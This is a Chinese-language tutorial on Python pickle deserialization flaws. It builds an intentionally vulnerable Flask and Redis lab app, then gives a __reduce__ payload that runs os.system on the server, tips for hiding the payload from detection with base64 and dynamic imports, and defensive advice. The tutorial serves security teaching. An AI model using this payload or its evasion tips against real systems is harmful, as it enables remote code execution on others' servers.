0x01 反序列化漏洞的技术解剖
合法声明:本文仅限授权安全测试,供安全研究人员学习,切勿用于非法用途。
反序列化漏洞在现代应用中是一种隐蔽而强大的攻击手段。通过攻击者精心构造的恶意数据,攻击者有机会执行任意代码或者操控程序的执行流。为了理解这一切是如何发生的,必须首先掌握反序列化的基本概念。
反序列化的基本概念
反序列化是程序将序列化的字节流还原为原始对象的过程。而序列化,则是将对象的状态转换为字节流的过程。在分布式计算和数据存储中,序列化和反序列化是常用的操作。然而,问题在于,许多开发者在进行反序列化操作时,未对输入进行适当的验证和限制,从而导致了反序列化漏洞的产生。
漏洞的成因
反序列化漏洞的产生主要源于两个方面:
- 信任边界的缺失:应用程序信任从不安全来源接收到的序列化数据,并直接进行反序列化,而不进行输入验证。
- 代码执行的滥用:某些编程语言在反序列化过程中允许执行特殊方法(如构造方法、
__wakeup()等),攻击者可以利用这些功能来执行恶意代码。
一旦攻击者可以控制反序列化的数据流,他们就可以伪造对象树的结构,或引入恶意构件,导致任意代码执行或数据泄露。
实验室搭建指南
为了更好地理解反序列化漏洞的利用,我们需要一个实验环境。在这个环境中,我们会设置一个容易受到反序列化攻击的应用程序。假设我们使用 Python 和一个简单的 Web 服务架构来模拟这一场景。
环境需求
- Python 3.x
- Flask Web 框架
- Redis 数据库(用于存储序列化的对象)
环境搭建步骤
- 安装 Flask 和 Redis:
<pre><code class="language-shell"> pip install Flask redis `
- 配置 Flask 应用:创建一个简单的 Flask 应用,将序列化对象存储在 Redis 中。
`python from flask import Flask, request, jsonify import pickle import redis
app = Flask(__name__) r = redis.StrictRedis(host='localhost', port=6379, db=0)
@app.route('/store_object', methods=['POST']) def store_object(): obj = request.get_data() obj_id = request.args.get('id') r.set(obj_id, obj) return jsonify({"status": "success", "message": "Object stored!"})
@app.route('/get_object', methods=['GET']) def get_object(): obj_id = request.args.get('id') obj = r.get(obj_id)
这里是漏洞的关键,直接对不受信任的数据进行反序列化
deserialized_obj = pickle.loads(obj) return jsonify({"status": "success", "data": repr(deserialized_obj)})
if __name__ == '__main__': app.run(debug=True) `

- 启动 Redis 和 Flask 应用:

- 启动 Redis:
redis-server - 启动 Flask 应用:
python app.py
在这个环境中,我们可以看到,/get_object API 直接将 Redis 中存储的对象进行反序列化,而不进行任何的验证或保护。这就是我们所说的反序列化漏洞入口。
恶意数据的构造艺术
要利用反序列化漏洞,关键在于如何构造恶意的数据。借助 Python 的 pickle 模块,我们可以构造一个能在反序列化时执行任意代码的对象。
利用思路
pickle 允许对象在被反序列化时执行任意代码。在 Python 中,通过重写 __reduce__ 方法,我们可以在反序列化时执行自定义的代码。
恶意 Payload 的构造
以下是一个经典的 Payload,它将在反序列化时执行系统命令。 </code></pre>python import pickle import os
class Malicious: def __reduce__(self): return (os.system, ('echo "This is a malicious command!"',))
序列化恶意对象
payload = pickle.dumps(Malicious())
将 Payload 发送到我们的实验环境中
import requests
response = requests.post('http://localhost:5000/store_object?id=1', data=payload) print(response.json())
触发反序列化
response = requests.get('http://localhost:5000/get_object?id=1') print(response.json()) <pre><code>
结果分析

当我们的 Malicious 类被反序列化时,os.system 会被调用,执行 echo 命令。在真实攻击场景中,这个命令可以替换为任何能在目标服务器上执行的恶意指令。
绕过技巧与免杀策略
在实际攻击中,仅仅能够在被控环境中执行代码是不够的。攻击者常需要绕过各种安全检测,比如 Web 应用防火墙(WAF)、入侵检测系统(IDS)等。这部分我们将讨论一些常见的绕过手法。
代码混淆
通过改变恶意 Payload 的外在特征,可以增加检测的难度。例如,可以通过 base64 编码进行简单的混淆:
</code></pre>python import base64
payload = pickle.dumps(Malicious()) encoded_payload = base64.b64encode(payload)
发送编码后的 Payload
response = requests.post('http://localhost:5000/store_object?id=1', data=encoded_payload) `
在 Web 应用层解码后再进行反序列化,可以有效绕过部分简单的正则检测。
动态加载
在一些高级攻击中,攻击者可能会使用动态加载模块的方法,以减少恶意代码在静态分析中的特征。例如使用 importlib 动态引入某些模块,这样可以在运行时才构造恶意行为,减少静态特征暴露。
检测与防御策略
反序列化漏洞的防御主要在于对输入的严格控制和反序列化过程的安全管理。
输入验证
绝不信任任何来自外部的输入。在设计反序列化逻辑时,应对输入数据进行严格的验证和限制。例如,验证数据的来源是否可信、数据的格式是否正确。
代码审计
通过代码审计及时发现并修复潜在的反序列化调用。寻找那些不安全的 pickle.loads 和其他类似的反序列化函数调用位置,并进行安全检查。
使用替代方案
对于 Python,可以考虑使用更安全的序列化方案,例如 json。虽然 json 功能上较弱,但在安全性上更有保障。
经验谈:从攻击到防御的心路历程
从攻击者的视角出发,反序列化漏洞是一种强大的攻击手段。有经验的攻击者会利用程序的复杂性和开发者的疏忽,将无害的输入转化为潜在的威胁。然而,从防御者的角度来看,了解如何识别和修补这些漏洞至关重要。
在我的职业生涯中,我常见的问题是开发者对输入数据的信任度过高。建议安全工程师们在设计系统时始终牢记:信任是一个漏洞。即便是在内部系统中,也不能因为信任内部用户而忽略了数据的验证和安全性检查。
希望这篇文章能帮助到网络安全领域的专业人士提高对反序列化漏洞的认识,从而更好地设计和防护他们的系统。